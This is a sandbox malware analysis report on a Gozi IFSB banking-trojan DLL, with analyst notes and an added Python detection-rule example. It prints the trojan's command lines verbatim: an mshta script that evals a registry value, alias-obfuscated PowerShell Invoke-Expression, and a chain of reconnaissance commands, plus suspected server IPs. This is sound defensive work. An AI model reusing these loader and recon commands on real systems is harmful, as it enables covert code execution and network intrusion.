Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-lgghqaafep
Target 62ea3f935563b.dll
SHA256 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Tags: gozi_ifsb 3000 banker trojan

Score: 10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V6
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

Threat Level: Known bad

The file 62ea3f935563b.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Execution chain recorded in behavioral2 (win10): the 64-bit regsvr32.exe hands the DLL to the SysWOW64 regsvr32.exe, which loads it. mshta.exe (its parent is not recorded in the tables) evaluates a script held in the registry value HKCU\Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45\SystemText and starts powershell.exe, which Invoke-Expressions a second value (StopName) of the same key, compiles two C# helpers through csc.exe, and then writes into and sets the thread context of Explorer.EXE. Explorer.EXE does the same to four RuntimeBroker.exe instances and a 32-bit cmd.exe, and runs a sequence of cmd.exe recon commands whose output is collected in C:\Users\Admin\AppData\Local\Temp\5402.bin1. The win7 detonation (behavioral1) stopped after the regsvr32 hop and produced no network traffic.

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Gathers system information

Discovers systems in the same network

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 09:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-08-03 09:30

Reported: 2022-08-03 09:32

Platform: win7-20220715-en

Max time kernel: 41s

Max time network: 44s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Events
PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe | 7

The 64-bit regsvr32.exe relaunching the SysWOW64 copy for a 32-bit DLL, and writing into that child while creating it, is regsvr32's own behaviour rather than injection by the sample. On win7 the run went no further: no mshta/powershell stage and no network activity. The dumps below cover the DLL image (1660-57: 0xE000 bytes at 0x10000000, the same region dumped from the SysWOW64 regsvr32.exe in behavioral2 as 2732-131) and a 0xD000-byte region (1660-63), also matched by 2732-136 in behavioral2.

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Network

N/A

Files

memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

memory/1660-55-0x0000000000000000-mapping.dmp

memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp

memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1660-63-0x0000000000190000-0x000000000019D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2022-08-03 09:30

Reported: 2022-08-03 09:32

Platform: win10v2004-20220721-en

Max time kernel: 151s

Max time network: 126s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A

The process that issued the query is mshta.exe itself, and Geo\Nation is read by many Microsoft components, so on its own this row is context rather than an indicator.

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3176 set thread context of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 2308 set thread context of 3412 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 3720 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 1676 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 3972 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 4872 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe

Changing another process's thread context after writing into it is the thread-hijack step of process injection. The six rows give the injection path: powershell.exe (3176) into the shell, Explorer.EXE (2308), then Explorer.EXE into four RuntimeBroker.exe instances (3412, 3720, 1676, 3972) and into the 32-bit cmd.exe (4872, command line "/C pause dll mail, ,"). Each pair also appears as a four-event write in the WriteProcessMemory table below, and the Files section holds a 0xA3000-byte region dumped from 2308 and from each RuntimeBroker.exe target, plus a 0x96000-byte region from 4872; those dumps are the first place to look for the injected module.

Enumerates physical storage devices

Discovers systems in the same network

discovery

Description | Indicator | Process | Target | Events
N/A | N/A | C:\Windows\system32\net.exe | N/A | 3

The three events are the three net view invocations in the Processes list (net view, net view /all /domain, net view /all).

Enumerates processes with tasklist

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A

Gathers system information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Events
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A | 2
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
N/A | N/A | C:\Windows\Explorer.EXE | N/A | 60

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target | Events
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
N/A | N/A | C:\Windows\Explorer.EXE | N/A | 5

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Events
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 2
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 2
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2
Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A | 1

The WMIC.exe block (21 privileges, each recorded twice) is wmic.exe enabling every privilege in its token at start-up, which it does on any host; the entries the sandbox left as bare LUIDs are SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36). SeDebugPrivilege on tasklist.exe is expected for a tool that opens other users' processes. The entry worth noting is SeDebugPrivilege enabled by powershell.exe (3176), the process that then writes into Explorer.EXE.

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Events
PID 3488 wrote to memory of 2732 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe | 3
PID 2984 wrote to memory of 3176 | N/A | C:\Windows\System32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 3176 wrote to memory of 1900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 2
PID 1900 wrote to memory of 3472 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | 2
PID 3176 wrote to memory of 3756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 2
PID 3756 wrote to memory of 2496 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | 2
PID 3176 wrote to memory of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE | 4
PID 2308 wrote to memory of 3412 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe | 4
PID 2308 wrote to memory of 3720 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe | 4
PID 2308 wrote to memory of 1676 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe | 4
PID 2308 wrote to memory of 3972 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe | 4
PID 2308 wrote to memory of 4856 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 2308 wrote to memory of 4872 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe | 4
PID 4856 wrote to memory of 4600 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe | 2
PID 4856 wrote to memory of 2928 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\more.com | 2
PID 2308 wrote to memory of 4872 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe | 2
PID 2308 wrote to memory of 2016 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 2308 wrote to memory of 3696 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 3696 wrote to memory of 3948 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe | 2
PID 2308 wrote to memory of 1752 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 2308 wrote to memory of 4668 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 4668 wrote to memory of 3428 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe | 2
PID 2308 wrote to memory of 1300 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 2308 wrote to memory of 1980 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 2
PID 1980 wrote to memory of 4288 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\nslookup.exe | 2
PID 2308 wrote to memory of 4648 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe | 1

Reading the table: a parent writing into a child it has just created is part of process creation itself, so the two-event rows (cmd.exe and its helper tools, mshta → powershell, csc → cvtres) and the three regsvr32 events carry no signal on their own. The rows to act on are the four-event writes from powershell.exe into the already running shell, Explorer.EXE (2308), and from Explorer.EXE into the RuntimeBroker.exe instances and the 32-bit cmd.exe (4872, six events across two groups), each of which is paired with a SetThreadContext entry above: write, then hijack a thread.

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Oeh7='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oeh7).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"

The HTA body is not on disk: mshta.exe is given an inline about: document whose script shrinks the window to 0×2 pixels, reads the SystemText value under HKCU\Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45 through WScript.Shell.RegRead, and eval()s it; the window closes unless the evaluated script sets window.flag.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xbxdiov -value gp; new-alias -name ivvusty -value iex; ivvusty ([System.Text.Encoding]::ASCII.GetString((xbxdiov "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))

This stage aliases gp (Get-ItemProperty) and iex (Invoke-Expression) to random names (xbxdiov, ivvusty) so that the invocation reads as an unknown command, which defeats matching on "iex (" while leaving "-value iex" in the command line as a detection handle; it reads the StopName value of the same key as the HTA, decodes it as ASCII and executes it. The two csc.exe/cvtres.exe pairs that follow are the Add-Type pattern produced when a script compiles C# at run time; the generated .cmdline, .0.cs and .dll files are hashed in the Files section.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5043.tmp" "c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES513D.tmp" "c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

PID 4872: a 32-bit cmd.exe kept alive on pause. It is the SetThreadContext target of Explorer.EXE and receives six WriteProcessMemory events from it; the 0x96000-byte region dumped from it (4872-170 in Files) is the region to examine for the injected code.

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5402.bin1 > C:\Users\Admin\AppData\Local\Temp\5402.bin & del C:\Users\Admin\AppData\Local\Temp\5402.bin1"

This last step copies the collection file under cmd /U, so the copy 5402.bin is UTF-16LE, and deletes the original. Note the two redirects written with > rather than >>: the wmic domain output from the first command is wiped when "systeminfo.exe >" truncates the file, so the shipped 5402.bin starts with the systeminfo section and holds eleven sections in all (systeminfo, net view, nslookup, tasklist /SVC, driverquery, reg query, net config workstation, the two nltest runs, net view /all /domain, net view /all), each terminated by an "echo --------" separator line.
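The command lines above are the detection handles. The following added example (not from the report or the sandbox vendor) encodes them as parent/image/command-line rules and runs them over constructed process-creation events built from this report's PIDs and command lines plus two benign decoys; the rule names, the min_stages threshold, the placeholder parent PIDs and the assumed PID 5100 for the final cmd /U instance are the author's choices, not page data.

```python
"""Flag the staged loader chain recorded in behavioral2 from process-creation
telemetry (parent, image, command line), e.g. Sysmon event 1 or EDR logs.
Added example: SAMPLE is constructed from this report's PIDs and command lines."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# (rule name, parent image pattern or None, image pattern, command-line pattern);
# all patterns are applied case-insensitively.
RULES = [
    ("regsvr32 /s on a DLL under the user's Temp directory",
     None, r"\\regsvr32\.exe$", r"/s\s+\S*\\AppData\\Local\\Temp\\[^\s\\]+\.dll"),
    ("mshta inline HTA that reads its script from the registry",
     None, r"\\mshta\.exe$", r"about:<hta:application>.*regread\("),
    ("powershell IEX of a registry value behind throwaway aliases",
     r"\\mshta\.exe$", r"\\powershell\.exe$", r"new-alias .*-value\s+(iex|gp)\b.*AppDataLow"),
    ("Add-Type style csc.exe compile spawned by powershell",
     r"\\powershell\.exe$", r"\\csc\.exe$", r'/noconfig /fullpaths @".*\.cmdline"'),
    ("host/domain recon redirected into a %TEMP%\\*.bin1 collection file",
     r"\\explorer\.exe$", r"\\cmd\.exe$",
     r'^cmd /C "(wmic|systeminfo|net|nslookup|tasklist|driverquery|reg\.exe|nltest)\b'
     r'.*>>?\s*\S+\\Temp\\\w+\.bin1"'),
    ("collection file re-encoded with cmd /U and the original deleted",
     r"\\explorer\.exe$", r"\\cmd\.exe$", r'^cmd /U /C "type \S+\.bin1 > \S+\.bin & del '),
]
COMPILED = [(n, re.compile(p, re.I) if p else None, re.compile(i, re.I), re.compile(c, re.I))
            for n, p, i, c in RULES]


def evaluate(events):
    """Return {rule name: [pids]} for matching events, honouring the parent-image
    constraint where a rule has one (parents are resolved from the same event list)."""
    image_by_pid = {e.pid: e.image for e in events}
    hits = defaultdict(list)
    for e in events:
        parent_image = image_by_pid.get(e.ppid, "")
        for name, parent_re, image_re, cmd_re in COMPILED:
            if parent_re and not parent_re.search(parent_image):
                continue
            if image_re.search(e.image) and cmd_re.search(e.cmdline):
                hits[name].append(e.pid)
    return dict(hits)


def verdict(events, min_stages=3):
    """Escalate only when several distinct stages are present: any single stage
    (a lone regsvr32 /s, a lone Add-Type compile) is common on clean hosts."""
    hits = evaluate(events)
    return ("gozi-like staged loader chain" if len(hits) >= min_stages else "no chain"), hits


SAMPLE = [
    ProcEvent(3488, 1, r"C:\Windows\system32\regsvr32.exe",
              r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll"),
    ProcEvent(2732, 3488, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll"),
    # Explorer.EXE is the already running shell; listed so parent lookups resolve.
    ProcEvent(2308, 1, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    # mshta's parent is not recorded in the report; ppid 1 is a placeholder.
    ProcEvent(2984, 1, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" "about:<hta:application><script>'
              r"Oeh7='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oeh7).regread("
              r"'HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'"
              r'));if(!window.flag)close()</script>"'),
    ProcEvent(3176, 2984, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xbxdiov '
              r'-value gp; new-alias -name ivvusty -value iex; ivvusty ([System.Text.Encoding]::ASCII'
              r'.GetString((xbxdiov "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-'
              r'3837-2A81EC5BFE45").StopName))'),
    ProcEvent(1900, 3176, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline"'),
    ProcEvent(4856, 2308, r"C:\Windows\system32\cmd.exe",
              r'cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5402.bin1"'),
    ProcEvent(3696, 2308, r"C:\Windows\system32\cmd.exe",
              r'cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5402.bin1"'),
    ProcEvent(4668, 2308, r"C:\Windows\system32\cmd.exe",
              r'cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"'),
    # The PID of the final cmd /U instance is not in the report; 5100 is assumed.
    ProcEvent(5100, 2308, r"C:\Windows\system32\cmd.exe",
              r'cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5402.bin1 > '
              r'C:\Users\Admin\AppData\Local\Temp\5402.bin & del C:\Users\Admin\AppData\Local\Temp\5402.bin1"'),
    # Benign decoys: same tools, but no Temp\*.bin1 sink and no Temp-resident DLL.
    ProcEvent(5000, 2308, r"C:\Windows\system32\cmd.exe",
              r'cmd /C "systeminfo.exe > C:\Users\Admin\Desktop\inventory.txt"'),
    ProcEvent(5001, 1, r"C:\Windows\system32\regsvr32.exe",
              r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'),
]
```

Run verdict(SAMPLE) to get the label and the per-rule PID hits; the two decoys match nothing, and feeding only the two regsvr32 events returns "no chain", which is the point of the stage threshold: a single regsvr32 /s or a single Add-Type compile should not page anyone, the combination should.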

Network

Country | Destination | Domain | Proto | Count
US | 13.107.42.16:80 | config.edge.skype.com | tcp | 1
FR | 2.18.109.224:443 | - | tcp | 1
US | 104.208.16.88:443 | - | tcp | 1
RO | 37.120.206.71:80 | 37.120.206.71 | tcp | 1
BE | 8.238.110.126:80 | - | tcp | 3
RU | 5.42.199.72:80 | 5.42.199.72 | tcp | 1
RO | 37.120.206.91:80 | 37.120.206.91 | tcp | 1
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp | 1

The two UDP rows are the "nslookup 127.0.0.1" recon step: nslookup first reverse-resolves its own server (8.8.8.8.in-addr.arpa) and then the queried address (1.0.0.127.in-addr.arpa). The three HTTP connections whose Domain column only repeats the IP (37.120.206.71, 5.42.199.72, 37.120.206.91) were made without any name resolution and are the candidates for the loader's server contact in this run; the remaining rows carry either no hostname or a Microsoft hostname, and nothing in the report ties them to the sample.

Files

memory/2732-130-0x0000000000000000-mapping.dmp

memory/2732-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/2732-136-0x00000000013D0000-0x00000000013DD000-memory.dmp

memory/3176-140-0x0000000000000000-mapping.dmp

memory/3176-141-0x00000184D1AC0000-0x00000184D1AE2000-memory.dmp

memory/3176-142-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp

memory/1900-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline

MD5 a8718937ef61364b1ff01a0f558f88fb
SHA1 b10850b439ae43950469eddf2d2e44b9d04bd2fb
SHA256 57f89a996df4e7e44e7b2f31c3dcf1134b2d46f785bc63bf314940842f1aa2c0
SHA512 0db3ea1e1c3b54537407321b02d64062a56faf40059e206ae4fb28df1c7b6c6234197bd05456642bb25e1d362d3b53a729c1c99d8366dd6c4da21040f54c29ea

\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3472-146-0x0000000000000000-mapping.dmp

